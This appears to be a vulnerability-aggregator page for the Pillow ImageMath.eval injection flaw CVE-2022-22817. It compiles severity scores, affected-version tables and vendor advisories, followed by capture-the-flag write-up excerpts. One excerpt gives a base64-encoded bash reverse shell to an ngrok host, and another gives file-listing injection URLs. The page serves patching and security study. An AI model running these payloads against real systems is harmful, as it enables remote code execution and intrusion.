CVE-2022-22817
published 2022-01-10CVE-2022-22817: PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method. A lambda expression could…
PriorityP353critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
3.40%
87.5th percentile
PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method. A lambda expression could also be used.
Affected
25 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | pillow | < pillow 9.4.0-1.1+deb12u1 (bookworm) | pillow 9.4.0-1.1+deb12u1 (bookworm) |
| debian | pillow | < pillow 9.0.0-1 (bookworm) | pillow 9.0.0-1 (bookworm) |
| paloalto | pan-os | — | — |
| python | pillow | < 9.0.1 | 9.0.1 |
| python | pillow | <= 10.1.0 | — |
| python | pillow | >= 0 < 8.1.2+dfsg-0.3+deb11u2 | 8.1.2+dfsg-0.3+deb11u2 |
| python | pillow | >= 0 < 8.1.2+dfsg-0.3+deb11u1 | 8.1.2+dfsg-0.3+deb11u1 |
| python | pillow | >= 0 < 9.4.0-1.1+deb12u1 | 9.4.0-1.1+deb12u1 |
| python | pillow | >= 0 < 9.0.0-1 | 9.0.0-1 |
| python | pillow | >= 0 < 10.2.0-1 | 10.2.0-1 |
| python | pillow | >= 0 < 9.0.0-1 | 9.0.0-1 |
| python | pillow | >= 0 < 10.2.0-1 | 10.2.0-1 |
| python | pillow | >= 0 < 9.0.0-1 | 9.0.0-1 |
| python | pillow | >= 0 < 9.0.1 | 9.0.1 |
| python | pillow | >= 0 < 10.2.0 | 10.2.0 |
| python | pillow | >= 0 < 9.0.0 | 9.0.0 |
| python | pillow | >= 0 < 5.1.0-1ubuntu0.8 | 5.1.0-1ubuntu0.8 |
| python | pillow | >= 0 < 5.1.0-1ubuntu0.7 | 5.1.0-1ubuntu0.7 |
| python | pillow | >= 0 < 7.0.0-4ubuntu0.6 | 7.0.0-4ubuntu0.6 |
| python | pillow | >= 0 < 7.0.0-4ubuntu0.5 | 7.0.0-4ubuntu0.5 |
| python | pillow | >= 0 < 2.3.0-1ubuntu3.4+esm3 | 2.3.0-1ubuntu3.4+esm3 |
| python | pillow | >= 0 < 3.1.2-0ubuntu1.6+esm1 | 3.1.2-0ubuntu1.6+esm1 |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
vendor_ubuntu7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
Schneider Electric EcoStruxure Power Operation (Update A)
cisa_ics·2026-02-26·CVSS 9.8
[CRITICAL] Schneider Electric EcoStruxure Power Operation (Update A)
ICS Advisory
##
Schneider Electric EcoStruxure Power Operation (Update A)
Last RevisedFebruary 26, 2026
Alert CodeICSA-25-203-04
Related topics:
Industrial Control System Vulnerabilities, Industrial Control Systems
View CSAF
## Summary
Successful exploitation of these vulnerabilities could result in the loss of system functionality or unauthorized access to system functions.
The following versions of Schneider Electric EcoStruxure Power Operation (Update A) are affected:
- EcoStruxure Power Operation (EPO) 2022 <=CU6 (CVE-2023-50447, CVE-2024-28219, CVE-2022-45198, CVE-2023-5217, CVE-2023-35945, CVE-2023-44487)
- EcoStruxure Power Operation (EPO) 2024 <=CU1 (CVE-2023-50447, CVE-2024-28219, CVE-2022-45198, CVE-2023-5217, CVE-2023-35945, CVE-2023-44487)
CVS
Palo Alto
PAN-SA-2024-0001 Informational Bulletin: Impact of OSS CVEs in PAN-OS
vendor_paloalto·2024-02-14·CVSS 9.8
CVE-2017-18342 [CRITICAL] PAN-SA-2024-0001 Informational Bulletin: Impact of OSS CVEs in PAN-OS
PAN-SA-2024-0001 Informational Bulletin: Impact of OSS CVEs in PAN-OS
The Palo Alto Networks Product Security Assurance team has evaluated the following open source software (OSS) CVEs as they relate to PAN-OS software. While PAN-OS software may include the
CVEs: CVE-2017-18342, CVE-2017-8923, CVE-2017-9120, CVE-2019-1551, CVE-2019-16865, CVE-2019-16905, CVE-2019-19523, CVE-2019-19528, CVE-2019-19911, CVE-2020-0404, CVE-2020-0431, CVE-2020-0466, CVE-2020-10379, CVE-2020-11538, CVE-2020-11608, CVE-2020-12114, CVE-2020-12321, CVE-2020-12362, CVE-2020-12363, CVE-2020-12364, CVE-2020-13757, CVE-2020-14314, CVE-2020-14351, CVE-2020-15778, CVE-2020-1967, CVE-2020-24394, CVE-2020-24504, CVE-2020-25211, CVE-2020-25212, CVE-2020-25284, CVE-2020-25285, CVE-2020-25717, CVE-2020-26541, CVE-2020-2715
Red Hat
pillow: Arbitrary Code Execution via the environment parameter
vendor_redhat·2024-01-19·CVSS 9.8
CVE-2023-50447 [CRITICAL] CWE-77 pillow: Arbitrary Code Execution via the environment parameter
pillow: Arbitrary Code Execution via the environment parameter
Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).
A vulnerability was found in Pillow, a popular Python imaging library. The flaw identified in the PIL.ImageMath.eval function enables arbitrary code execution by manipulating the environment parameter.
Statement: The vulnerability in Pillow's PIL.ImageMath.eval function poses a significant threat due to its potential for arbitrary code execution. Pillow's widespread use in diverse domains makes this flaw particularly impactful, as it could lead to unauthorized access, data breaches, and compromise of entire systems. The complex exploi
Debian
CVE-2023-50447: pillow - Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the...
vendor_debian·2023·CVSS 9.8
CVE-2023-50447 [CRITICAL] CVE-2023-50447: pillow - Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the...
Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).
Scope: local
bookworm: resolved (fixed in 9.4.0-1.1+deb12u1)
bullseye: resolved (fixed in 8.1.2+dfsg-0.3+deb11u2)
forky: resolved (fixed in 10.2.0-1)
sid: resolved (fixed in 10.2.0-1)
trixie: resolved (fixed in 10.2.0-1)
Ubuntu
Pillow vulnerability
vendor_ubuntu·2022-10-24·CVSS 7.5
CVE-2022-22817 [HIGH] Pillow vulnerability
Title: Pillow vulnerability
Summary: An incomplete fix was discovered in Pillow.
USN-5227-1 fixed vulnerabilities in Pillow. It was discovered that the fix
for CVE-2022-22817 was incomplete. This update fixes the problem.
Original advisory details:
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to hang, resulting in a denial
of service. (CVE-2021-23437)
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to crash, resulting in a denial
of service. This issue ony affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, an
Ubuntu
Pillow vulnerabilities
vendor_ubuntu·2022-01-17·CVSS 7.5
CVE-2021-23437 [HIGH] Pillow vulnerabilities
Title: Pillow vulnerabilities
Summary: Several security issues were fixed in Pillow.
USN-5227-1 fixed several vulnerabilities in Pillow. This update provides
the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.
Original advisory details:
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to hang, resulting in a denial
of service. (CVE-2021-23437)
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to crash, resulting in a denial
of service. This issue ony affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS
Ubuntu
Pillow vulnerabilities
vendor_ubuntu·2022-01-13·CVSS 7.5
CVE-2022-22817 [HIGH] Pillow vulnerabilities
Title: Pillow vulnerabilities
Summary: Several security issues were fixed in Pillow.
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to hang, resulting in a denial
of service. (CVE-2021-23437)
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to crash, resulting in a denial
of service. This issue ony affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and
Ubuntu 21.04. (CVE-2021-34552)
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a spe
Red Hat
python-pillow: PIL.ImageMath.eval allows evaluation of arbitrary expressions
vendor_redhat·2022-01-02·CVSS 9.8
CVE-2022-22817 [CRITICAL] CWE-77 python-pillow: PIL.ImageMath.eval allows evaluation of arbitrary expressions
python-pillow: PIL.ImageMath.eval allows evaluation of arbitrary expressions
PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method. A lambda expression could also be used.
A flaw was found in python-pillow. The vulnerability occurs due to Improper Neutralization, leading to command injection. This flaw allows an attacker to externally-influenced input commands that modify the intended command.
Statement: Red Hat Quay ships a vulnerable version of Pillow as a dependency of xhtml2pdf. The xhtml2pdf package is used in the invoice generation feature of Quay, however, the vulnerable ImageMath module is not used by xhtml2pdf. Therefore impact for Quay is rated Low.
Package: quay/quay-rhel8 (Red Hat Quay 3) - Affecte
Debian
CVE-2022-22817: pillow - PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary express...
vendor_debian·2022·CVSS 9.8
CVE-2022-22817 [CRITICAL] CVE-2022-22817: pillow - PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary express...
PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method. A lambda expression could also be used.
Scope: local
bookworm: resolved (fixed in 9.0.0-1)
bullseye: resolved (fixed in 8.1.2+dfsg-0.3+deb11u1)
forky: resolved (fixed in 9.0.0-1)
sid: resolved (fixed in 9.0.0-1)
trixie: resolved (fixed in 9.0.0-1)
GHSA
Arbitrary Code Execution in Pillow
ghsa·2024-01-19·CVSS 9.8
CVE-2023-50447 [CRITICAL] CWE-94 Arbitrary Code Execution in Pillow
Arbitrary Code Execution in Pillow
Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).
OSV
Arbitrary Code Execution in Pillow
osv·2024-01-19·CVSS 9.8
CVE-2023-50447 [CRITICAL] Arbitrary Code Execution in Pillow
Arbitrary Code Execution in Pillow
Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).
OSV
CVE-2023-50447: Pillow through 10
osv·2024-01-19·CVSS 9.8
CVE-2023-50447 [CRITICAL] CVE-2023-50447: Pillow through 10
Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).
OSV
pillow vulnerability
osv·2022-10-24·CVSS 7.5
CVE-2022-22817 [HIGH] pillow vulnerability
pillow vulnerability
USN-5227-1 fixed vulnerabilities in Pillow. It was discovered that the fix
for CVE-2022-22817 was incomplete. This update fixes the problem.
Original advisory details:
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to hang, resulting in a denial
of service. (CVE-2021-23437)
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to crash, resulting in a denial
of service. This issue ony affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and
Ubuntu 21.04. (CVE-2021-34552)
It was discovered that Pill
OSV
pillow vulnerabilities
osv·2022-01-17·CVSS 7.5
CVE-2021-23437 [HIGH] pillow vulnerabilities
pillow vulnerabilities
USN-5227-1 fixed several vulnerabilities in Pillow. This update provides
the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.
Original advisory details:
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to hang, resulting in a denial
of service. (CVE-2021-23437)
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to crash, resulting in a denial
of service. This issue ony affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and
Ubuntu 21.04. (CVE-2021-34552)
It was discovered that Pi
OSV
pillow vulnerabilities
osv·2022-01-13·CVSS 7.5
CVE-2021-23437 [HIGH] pillow vulnerabilities
pillow vulnerabilities
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to hang, resulting in a denial
of service. (CVE-2021-23437)
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to crash, resulting in a denial
of service. This issue ony affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and
Ubuntu 21.04. (CVE-2021-34552)
It was discovered that Pillow incorrectly handled certain image files. If a
user or automated system were tricked into opening a specially-crafted
file, a remote attacker could cause Pillow to cr
GHSA
Arbitrary expression injection in Pillow
ghsa·2022-01-12
CVE-2022-22817 [CRITICAL] CWE-74 Arbitrary expression injection in Pillow
Arbitrary expression injection in Pillow
`PIL.ImageMath.eval` in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method `ImageMath.eval("exec(exit())")`.
While Pillow 9.0.0 restricted top-level builtins available to PIL.ImageMath.eval(), it did not prevent builtins available to lambda expressions. These are now also restricted in 9.0.1.
OSV
Arbitrary expression injection in Pillow
osv·2022-01-12
CVE-2022-22817 [CRITICAL] Arbitrary expression injection in Pillow
Arbitrary expression injection in Pillow
`PIL.ImageMath.eval` in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method `ImageMath.eval("exec(exit())")`.
While Pillow 9.0.0 restricted top-level builtins available to PIL.ImageMath.eval(), it did not prevent builtins available to lambda expressions. These are now also restricted in 9.0.1.
OSV
CVE-2022-22817: PIL
osv·2022-01-10
CVE-2022-22817 CVE-2022-22817: PIL
PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method.
OSV
CVE-2022-22817: PIL
osv·2022-01-10·CVSS 9.8
CVE-2022-22817 [CRITICAL] CVE-2022-22817: PIL
PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method. A lambda expression could also be used.
No detection rules found.
No public exploits indexed.
CTF
Web / PillowFight
ctf_writeups·2024·CVSS 9.8
CVE-2022-22817 [CRITICAL] Web / PillowFight
# PillowFight
## My Solution
We can see that the app is using Python Pillow 8.4.0 which we know has an exploit where we could execute code because it would be passing it to an eval statement ([CVE-2022-22817](https://github.com/advisories/GHSA-8vj2-vxx3-667w)):
We also have access to the API docs which unlike the functionality on the main page, takes an additional argument of "eval_command"... very handy, we don't even need the vulnerable Pillow I guess:
Within that eval_command argument we can pass a payload like this to get a reverse shell:
```python
__import__('os').system("echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMC50Y3AuZXUubmdyb2suaW8vMTU4NzUgIDA+JjE=|base64 -d|bash")
```
Or, because there is no curl, wget or netcat:
We could make a static folder and copy the flag there:
```pyt
CTF
Web / Amidst_Us
ctf_writeups·2022·CVSS 9.8
CVE-2022-22817 [CRITICAL] Web / Amidst_Us
We get on a dark page that seems to only have one functionality. We can upload an image when clicking somewhere in the center and it will modify it a bit.
It seems to be using Pillow 8.4.0 according to the source code.
The code below is the one applied to the given picture.
After some research we can find an interesting CVE that applies here. Specifically CVE-2022-22817. ImageMath.eval allows for arbitrary expressions, such as ones that use the Python exec method. From the code above, we can see that our injection point is in the Background.
We could've used a payload to get RCE but in the interest of speed, we can just exfiltrate it using a HTTP request.
HTB{i_slept_my_way_to_rce}
CTF
2022_Hackers_Playground / Imageium
ctf_writeups·2022·CVSS 9.8
CVE-2022-22817 [CRITICAL] 2022_Hackers_Playground / Imageium
Imageium Writeup
===
##### Exploitation:
This challenge is about RCE in python web service.
There is a web application that uses one of the vulnerable versions of the Pillow python library. (CVE-2022-22817)
Participant have to identify the type of vulnerability and create an exploit to read the flag from a text file.
```
view-source:http://facingworlds.sstf.site/dynamic/modified?mode=__import__('os').listdir('.') -------------------------------------
ImageMath error not image object: ['secret', 'app.py', 'original.jpeg', 'pilcve.wsgi']
```
```
view-source:http://facingworlds.sstf.site/dynamic/modified?mode=__import__('os').listdir('secret') -------------------------------------
ImageMath error not image object: ['flag.txt']
```
```
view-source:http://facingworlds.sstf.site/dynamic/
Bugzilla
CVE-2023-50447 pillow:Arbitrary Code Execution via the environment parameter
bugzilla·2024-01-22·CVSS 9.8
CVE-2023-50447 [CRITICAL] CVE-2023-50447 pillow:Arbitrary Code Execution via the environment parameter
CVE-2023-50447 pillow:Arbitrary Code Execution via the environment parameter
Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).
http://www.openwall.com/lists/oss-security/2024/01/20/1
https://devhub.checkmarx.com/cve-details/CVE-2023-50447/
https://duartecsantos.github.io/2023-01-02-CVE-2023-50447/
https://github.com/python-pillow/Pillow/releases
Discussion:
Created python-pillow tracking bugs for this issue:
Affects: fedora-all [bug 2259480]
---
Fix: https://github.com/python-pillow/Pillow/pull/7655/files
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 8.8 Extended Update Support
Via RHSA-2024:0754 h
https://lists.debian.org/debian-lts-announce/2022/01/msg00018.htmlhttps://lists.debian.org/debian-lts-announce/2024/03/msg00021.htmlhttps://pillow.readthedocs.io/en/stable/releasenotes/9.0.0.html#restrict-builtins-available-to-imagemath-evalhttps://pillow.readthedocs.io/en/stable/releasenotes/9.0.1.html#securityhttps://security.gentoo.org/glsa/202211-10https://www.debian.org/security/2022/dsa-5053https://lists.debian.org/debian-lts-announce/2022/01/msg00018.htmlhttps://lists.debian.org/debian-lts-announce/2024/03/msg00021.htmlhttps://pillow.readthedocs.io/en/stable/releasenotes/9.0.0.html#restrict-builtins-available-to-imagemath-evalhttps://pillow.readthedocs.io/en/stable/releasenotes/9.0.1.html#securityhttps://security.gentoo.org/glsa/202211-10https://www.debian.org/security/2022/dsa-5053
2022-01-10
Published